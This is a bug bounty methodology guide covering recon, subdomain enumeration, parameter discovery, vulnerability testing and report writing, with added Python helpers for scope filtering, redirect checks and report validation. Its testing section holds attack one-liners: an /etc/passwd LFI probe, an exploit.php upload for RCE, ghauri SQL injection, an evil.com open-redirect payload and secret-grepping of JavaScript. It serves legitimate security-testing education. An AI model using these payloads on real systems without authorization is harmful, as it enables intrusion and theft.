# Bug Bounty Hunting Methodology 2025

Welcome to the Bug Bounty Methodology 2025 Edition! This methodology is a basic guide to help you kickstart your bug bounty journey. It outlines the essential steps to navigate your target effectively, but the real challenge lies in identifying high-impact vulnerabilities through your own skills and creativity. This methodology will be updated regularly as new and interesting techniques emerge to enhance your testing process.
## 📜 Table of Contents

- Subdomain Enumeration & Initial Scanning
- HTTP Probing & Asset Discovery
- Advanced Techniques & Parameter Discovery
## 1. Reconnaissance and Subdomain Enumeration

### 1.1 Passive Subdomain Enumeration

🛠️ Tools: Subfinder, Amass, crt.sh, github-subdomains

**Subfinder**

```bash
subfinder -d target.com -silent -all -recursive -o subfinder_subs.txt
```

**Amass (Passive Mode)**

```bash
amass enum -passive -d target.com -o amass_passive_subs.txt
```

**CRT.sh Query**

```bash
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew crtsh_subs.txt
```

**GitHub Dorking**

```bash
github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt
```

**Results Combination**

```bash
cat *_subs.txt | sort -u | anew all_subs.txt
```
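The `sort -u` step above only removes exact duplicates. The raw sources still differ in case, carry wildcard prefixes and trailing dots, and (especially certificate transparency) can include names that merely contain the target string but are outside scope. The following script is an added example, not part of the original methodology or any of the tools it lists: it normalizes crt.sh-style JSON and subfinder-style text output and keeps only names that sit under the assumed apex `target.com` on a label boundary. The sample inputs are constructed.

```python
"""Normalize and scope-check subdomain candidates from passive sources.

Added example (not part of the original page). Assumes the apex domain
is target.com; the sample data below is constructed, not real output.
"""
from __future__ import annotations

import json

APEX = "target.com"  # assumed apex of the in-scope target

# Constructed sample in the shape crt.sh returns with output=json.
# One certificate can carry several names, newline-separated.
CRTSH_JSON = json.dumps([
    {"name_value": "*.target.com\nwww.target.com"},
    {"name_value": "API.Target.com"},
    {"name_value": "target.com.evil.net"},   # contains the string, not in scope
    {"name_value": "dev.target.com."},       # trailing dot
])

# Constructed sample in the shape of a subfinder output file.
SUBFINDER_TXT = "www.target.com\nmail.target.com\n\n*.staging.target.com\n"


def names_from_crtsh(raw_json: str) -> list[str]:
    """Flatten crt.sh JSON into individual names."""
    names: list[str] = []
    for entry in json.loads(raw_json):
        names.extend(entry["name_value"].split("\n"))
    return names


def names_from_text(raw_text: str) -> list[str]:
    """One name per line, blank lines ignored."""
    return [line for line in raw_text.splitlines() if line.strip()]


def normalize(name: str) -> str:
    """Lowercase, drop trailing dot, strip any number of leading '*.'."""
    name = name.strip().lower().rstrip(".")
    while name.startswith("*."):
        name = name[2:]
    return name


def in_scope(name: str, apex: str = APEX) -> bool:
    """True for the apex itself or a subdomain ending in '.' + apex.

    The leading dot is what rejects look-alikes such as nottarget.com
    and target.com.evil.net.
    """
    return name == apex or name.endswith("." + apex)


def merge_scoped(*sources: list[str], apex: str = APEX) -> list[str]:
    """Union of all sources after normalization and scope filtering."""
    seen: set[str] = set()
    for names in sources:
        for raw in names:
            candidate = normalize(raw)
            if candidate and in_scope(candidate, apex):
                seen.add(candidate)
    return sorted(seen)


if __name__ == "__main__":
    merged = merge_scoped(names_from_crtsh(CRTSH_JSON), names_from_text(SUBFINDER_TXT))
    print("\n".join(merged))
```

Run it once on your combined `*_subs.txt` files before any active resolution so that out-of-scope names never reach the brute-force or probing stages.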
### 1.2 Active Subdomain Enumeration

**MassDNS**

```bash
massdns -r resolvers.txt -t A -o S -w massdns_results.txt wordlist.txt
```

**Shuffledns**

```bash
shuffledns -d target.com -list all_subs.txt -r resolvers.txt -o active_subs.txt
```

**DNSX Resolution**

```bash
dnsx -l active_subs.txt -resp -o resolved_subs.txt
```

**SubBrute**

```bash
python3 subbrute.py target.com -w wordlist.txt -o brute_force_subs.txt
```

**FFuF Subdomain**

```bash
ffuf -u https://FUZZ.target.com -w wordlist.txt -t 50 -mc 200,403 -o ffuf_subs.txt
```
### 1.3 Handling Specific (Non-Wildcard) Targets

**GAU**

```bash
gau target.example.com | anew gau_results.txt
```

**Waybackurls**

```bash
waybackurls target.example.com | anew wayback_results.txt
```

**Katana**

```bash
katana -u target.example.com -silent -jc -o katana_results.txt
```

**Hakrawler**

```bash
echo "https://target.example.com" | hakrawler -depth 2 -plain -js -out hakrawler_results.txt
```

### Additional Advanced Techniques

**Reverse DNS**

```bash
dnsx -ptr -l resolved_subs.txt -resp-only -o reverse_dns.txt
```

**ASN Enumeration**

```bash
amass intel -asn <ASN_NUMBER> -o asn_results.txt
```

**Cloud Asset Enumeration**

```bash
cloud_enum -k target.com
```

**Results Validation**

```bash
cat all_subs.txt | httpx -silent -title -o live_subdomains.txt
```
## 2. Discovery and Probing

### 2.1 HTTP Probing

**HTTPX Probing**

```bash
httpx -l resolved_subs.txt -p 80,443,8080,8443 -silent -title -sc -ip -o live_websites.txt
```

**Custom Filtering**

```bash
cat live_websites.txt | grep -i "login\|admin" | tee login_endpoints.txt
```

### 2.2 JavaScript Analysis

**JS Extraction**

```bash
cat live_websites.txt | waybackurls | grep "\.js" | anew js_files.txt
```

**LinkFinder Analysis**

```bash
python3 linkfinder.py -i js_files.txt -o js_endpoints.txt
```

**Sensitive Pattern Search**

```bash
cat js_files.txt | gf aws-keys | tee aws_keys.txt
cat js_files.txt | gf urls | tee sensitive_urls.txt
```

**API Key Validation**

```bash
curl -X GET "https://api.example.com/resource" -H "Authorization: Bearer <extracted_key>"
```
### 2.3 Advanced Google Dorking

**Automated Dorking**

```bash
python3 GitDorker.py -tf <github_token.txt> -q target.com -d dorks.txt -o git_dorks_output.txt
```

**Admin/Login Files**

```text
site:*.example.com inurl:"*admin | login" | inurl:.php | .asp
```

**Config Files**

```text
site:*.example.com ext:env | ext:yaml | ext:ini
```

**Public Keys**

```text
site:*.example.com inurl:"id_rsa.pub" | inurl:".pem"
```
### 2.4 URL Discovery

**Katana Crawling**

```bash
katana -list live_websites.txt -jc -o katana_urls.txt
```

**Gospider**

```bash
gospider -s "https://target.com" -d 2 -o gospider_output/
```

**Hakrawler**

```bash
echo "https://target.com" | hakrawler -depth 3 -plain -out hakrawler_results.txt
```

### 2.5 Archive Enumeration

**Archive URL Collection**

```bash
gau --subs target.com | anew archived_urls.txt
waybackurls target.com | anew wayback_urls.txt
```

**Parameter Extraction**

```bash
cat archived_urls.txt | grep "=" | anew parameters.txt
```
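`grep "="` keeps every archived URL that contains an equals sign, so static assets with cache-busting query strings and thousands of URLs that differ only in parameter values all survive. What the later parameter-testing steps actually need is the distinct parameter names per endpoint. The script below is an added example (not part of the original page or of gau/waybackurls): it parses each URL, skips static extensions, and groups parameter names by host and path. The URL list is constructed sample data.

```python
"""Group archived URLs into (host, path) -> distinct parameter names.

Added example, not from the original page. The input below is a
constructed sample in the shape gau / waybackurls produce.
"""
from __future__ import annotations

from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Extensions that almost never carry testable parameters.
STATIC_EXT = (".css", ".js", ".png", ".jpg", ".gif", ".woff", ".svg")

# Constructed sample, not real archive output.
ARCHIVED_URLS = """\
https://target.com/search?q=shoes&page=1
https://target.com/search?q=hats&page=2&sort=asc
https://target.com/static/app.js?v=123
https://target.com/product
https://shop.target.com/item?id=42
https://target.com/search?Q=caps
http://target.com/search?q=boots
"""


def extract_parameters(raw: str) -> dict[tuple[str, str], list[str]]:
    """Return {(host, path): sorted parameter names} for non-static URLs.

    http and https copies of the same endpoint merge; parameter names are
    kept case-sensitive because many frameworks treat q and Q differently.
    """
    found: dict[tuple[str, str], set[str]] = defaultdict(set)
    for line in raw.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = urlsplit(line)
        if parts.path.lower().endswith(STATIC_EXT):
            continue
        # keep_blank_values so a name with an empty value (?debug=) still counts
        names = {k for k, _ in parse_qsl(parts.query, keep_blank_values=True)}
        if not names:
            continue
        found[(parts.hostname or "", parts.path)].update(names)
    return {key: sorted(names) for key, names in found.items()}


if __name__ == "__main__":
    for (host, path), names in extract_parameters(ARCHIVED_URLS).items():
        print(f"{host}{path}: {', '.join(names)}")
```

Feeding the resulting `(endpoint, parameter name)` pairs into the parameter-testing steps instead of the raw `parameters.txt` removes most of the redundant requests from later stages.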
## 3. Advanced Enumeration Techniques

### 3.1 Parameter Discovery

**Arjun Parameter Discovery**

```bash
arjun -u "https://target.example.com" -m GET,POST --stable -o params.json
```

**ParamSpider Web Parameters**

```bash
python3 paramspider.py --domain target.com --exclude woff,css,js --output paramspider_output.txt
```

**FFuF Parameter Bruteforce**

```bash
ffuf -u https://target.com/page.php?FUZZ=test -w /usr/share/wordlists/params.txt -o parameter_results.txt
```

### 3.2 Cloud Asset Enumeration

**Cloud Bucket Enumeration**

```bash
cloud_enum -k target.com -b buckets.txt -o cloud_enum_results.txt
```

**S3 Bucket Access Test**

```bash
aws s3 ls s3://<bucket_name> --no-sign-request
```

**S3 Bucket Content Dump**

```bash
python3 AWSBucketDump.py -b target-bucket -o dumped_data/
```

### 3.3 Content Discovery

**Feroxbuster**

```bash
feroxbuster -u https://target.com -w /usr/share/wordlists/common.txt -r -t 20 -o recursive_results.txt
```

**Dirsearch**

```bash
dirsearch -u https://target.com -w /usr/share/wordlists/content_discovery.txt -e php,html,js,json -x 404 -o dirsearch_results.txt
```

**FFuF Recursive**

```bash
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/content_discovery.txt -mc 200,403 -recursion -recursion-depth 3 -o ffuf_results.txt
```

### 3.4 API Enumeration

**Kiterunner**

```bash
kr scan https://api.target.com -w /usr/share/kiterunner/routes-large.kite -o api_routes.txt
```

### 3.5 ASN Mapping

**ASN Lookup**

```bash
amass intel -asn <ASN_Number> -o asn_ips.txt
```

**Shodan Enumeration**

```bash
shodan search "net:<ip_range>" --fields ip_str,port --limit 100
```

**Censys Asset Search**

```bash
censys search "autonomous_system.asn:<ASN_Number>" -o censys_assets.txt
```
## 4. Vulnerability Testing

### 4.1 High-Priority Vulnerabilities

**🐞 CSRF Testing**

```bash
cat live_websites.txt | gf csrf | tee csrf_endpoints.txt
```

**🐞 LFI Testing**

```bash
cat live_websites.txt | gf lfi | qsreplace "/etc/passwd" | xargs -I@ curl -s @ | grep "root:x:" > lfi_results.txt
```

**🐞 RCE Testing**

```bash
curl -X POST -F "file=@exploit.php" https://target.com/upload
```

**🐞 SQLi Testing**

```bash
ghauri -u "https://target.com?id=1" --dbs --batch
```

**🐞 Sensitive Data Search**

```bash
cat js_files.txt | grep -Ei "key|token|auth|password" > sensitive_data.txt
```

**🐞 Open Redirect Test**

```bash
cat urls.txt | grep "=http" | qsreplace "https://evil.com" | xargs -I@ curl -I -s @ | grep "evil.com"
```
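When an open redirect from the test above is confirmed, the report's remediation section has to explain why the application's existing check failed and what a correct one looks like. The snippet below is an added example, not code from the original page or from any target: the first function is the kind of prefix check that the test above defeats, the second resolves the candidate against the site origin and requires the final host to be on an explicit allowlist. `SITE_ORIGIN` and `ALLOWED_HOSTS` are assumed values for the example.

```python
"""Open redirect: a defeated prefix check beside a hardened allowlist check.

Added example, not from the original page. SITE_ORIGIN and ALLOWED_HOSTS
are assumed values standing in for an application's real configuration.
"""
from urllib.parse import urljoin, urlsplit

SITE_ORIGIN = "https://target.com"                 # assumed application origin
ALLOWED_HOSTS = {"target.com", "www.target.com"}   # assumed redirect allowlist


def redirect_allowed_naive(next_url: str) -> bool:
    """Vulnerable: string-prefix checks on the raw parameter value.

    Accepts anything beginning with '/' or with the site's own URL, so a
    network-path reference or a look-alike hostname passes.
    """
    return next_url.startswith("/") or next_url.startswith(SITE_ORIGIN)


def redirect_allowed_hardened(next_url: str) -> bool:
    """Resolve the value the way a browser would, then check scheme and host."""
    # Browsers fold backslashes into slashes; urlsplit does not, so reject early.
    if "\\" in next_url:
        return False
    resolved = urlsplit(urljoin(SITE_ORIGIN, next_url))
    if resolved.scheme not in ("http", "https"):
        return False  # blocks javascript:, data:, and similar schemes
    return resolved.hostname in ALLOWED_HOSTS


def compare(next_url: str) -> tuple[bool, bool]:
    """(naive verdict, hardened verdict) for one candidate value."""
    return redirect_allowed_naive(next_url), redirect_allowed_hardened(next_url)


if __name__ == "__main__":
    # Constructed candidates, including the value the test above injects.
    for candidate in ("/account", "https://evil.com", "//evil.com", "https://target.com.evil.com"):
        print(f"{candidate!r}: naive={compare(candidate)[0]} hardened={compare(candidate)[1]}")
```

A relative path such as `/account` passes both checks; the hardened version is the one that still rejects values which resolve to a host outside the allowlist. Recommending an allowlist of hosts (or, better, of internal paths only) is the remediation to put in the report.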
## 5. The "Two-Eye" Approach 👀

- **First Eye:** Focus on testing every gathered subdomain, endpoint, or parameter for common vulnerabilities.
- **Second Eye:** Identify "interesting" findings like exposed credentials, forgotten subdomains, or admin panels.

**Actionable Steps:**

- If a vulnerability is identified, create a proof of concept (POC) and test its impact.
- If no vulnerabilities are found, pivot to deeper testing on unique subdomains or endpoints.
## 6. Proof of Concept (POC) Creation

**🎥 Video POC**

Demonstrate vulnerabilities in action using screen recording tools like Greenshot or OBS Studio.

**📸 Screenshot POC**

Capture clear screenshots with annotations to explain each step.
## 7. Reporting

**📝 Report Structure**

- Technical Details
- Supporting Evidence (POC)
- Remediation
- Additional Security Controls

**Supporting Materials**

- Screenshots & Annotations
- HTTP Request/Response Logs

**Best Practices**

- Write clear, concise descriptions
- Include detailed reproduction steps
- Provide actionable remediation advice
- Support findings with evidence
- Use professional formatting
- Highlight business impact
- Include verification steps
```markdown
# Vulnerability Report: [Title]
## Overview
- Severity: [Critical/High/Medium/Low]
- CVSS Score: [Score]
- Affected Component: [Component]
## Description
[Detailed technical description]
## Steps to Reproduce
1. [Step 1]
2. [Step 2]
3. [Step n...]
## Impact
[Business and technical impact]
## Proof of Concept
[Screenshots, videos, code]
## Recommendations
[Detailed fix recommendations]
## References
[CVE, CWE, related resources]
```
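Two things triagers check first are whether every section of the template is filled in and whether the stated severity agrees with the CVSS score. The helper below is an added example, not part of the original page: it renders the template above from a dictionary, reports empty fields, and checks the severity against the CVSS v3.1 qualitative rating bands (0.1 to 3.9 Low, 4.0 to 6.9 Medium, 7.0 to 8.9 High, 9.0 to 10.0 Critical). The sample report content is constructed placeholder text.

```python
"""Render the report template and check it for completeness and consistency.

Added example, not from the original page. SAMPLE_REPORT is constructed
placeholder content, not a real finding.
"""
from __future__ import annotations

REQUIRED_FIELDS = (
    "title", "severity", "cvss", "component", "description",
    "steps", "impact", "poc", "recommendations", "references",
)

# Constructed placeholder content for the example.
SAMPLE_REPORT = {
    "title": "Example finding (constructed)",
    "severity": "High",
    "cvss": 7.5,
    "component": "[Component]",
    "description": "[Detailed technical description]",
    "steps": ["[Step 1]", "[Step 2]"],
    "impact": "[Business and technical impact]",
    "poc": "[Screenshots, videos, code]",
    "recommendations": "[Detailed fix recommendations]",
    "references": "[CVE, CWE, related resources]",
}


def cvss_rating(score: float) -> str:
    """CVSS v3.1 qualitative severity rating for a base score."""
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS score must be between 0.0 and 10.0")
    if score == 0.0:
        return "None"
    if score < 4.0:
        return "Low"
    if score < 7.0:
        return "Medium"
    if score < 9.0:
        return "High"
    return "Critical"


def validate(report: dict) -> list[str]:
    """List of problems; empty means the report is complete and consistent."""
    problems = [f"missing field: {field}" for field in REQUIRED_FIELDS if not report.get(field)]
    if report.get("cvss") is not None and report.get("severity"):
        expected = cvss_rating(float(report["cvss"]))
        if report["severity"] != expected:
            problems.append(
                f"severity {report['severity']} does not match CVSS {report['cvss']} ({expected})"
            )
    return problems


def render(report: dict) -> str:
    """Fill the Markdown template used on this page."""
    steps = "\n".join(f"{i}. {step}" for i, step in enumerate(report["steps"], 1))
    return (
        f"# Vulnerability Report: {report['title']}\n"
        "## Overview\n"
        f"- Severity: {report['severity']}\n"
        f"- CVSS Score: {report['cvss']}\n"
        f"- Affected Component: {report['component']}\n"
        "## Description\n"
        f"{report['description']}\n"
        "## Steps to Reproduce\n"
        f"{steps}\n"
        "## Impact\n"
        f"{report['impact']}\n"
        "## Proof of Concept\n"
        f"{report['poc']}\n"
        "## Recommendations\n"
        f"{report['recommendations']}\n"
        "## References\n"
        f"{report['references']}\n"
    )


if __name__ == "__main__":
    issues = validate(SAMPLE_REPORT)
    print(render(SAMPLE_REPORT) if not issues else "\n".join(issues))
```

Run `validate` before submitting; a severity that disagrees with the CVSS score is one of the most common reasons a report is downgraded or bounced back during triage.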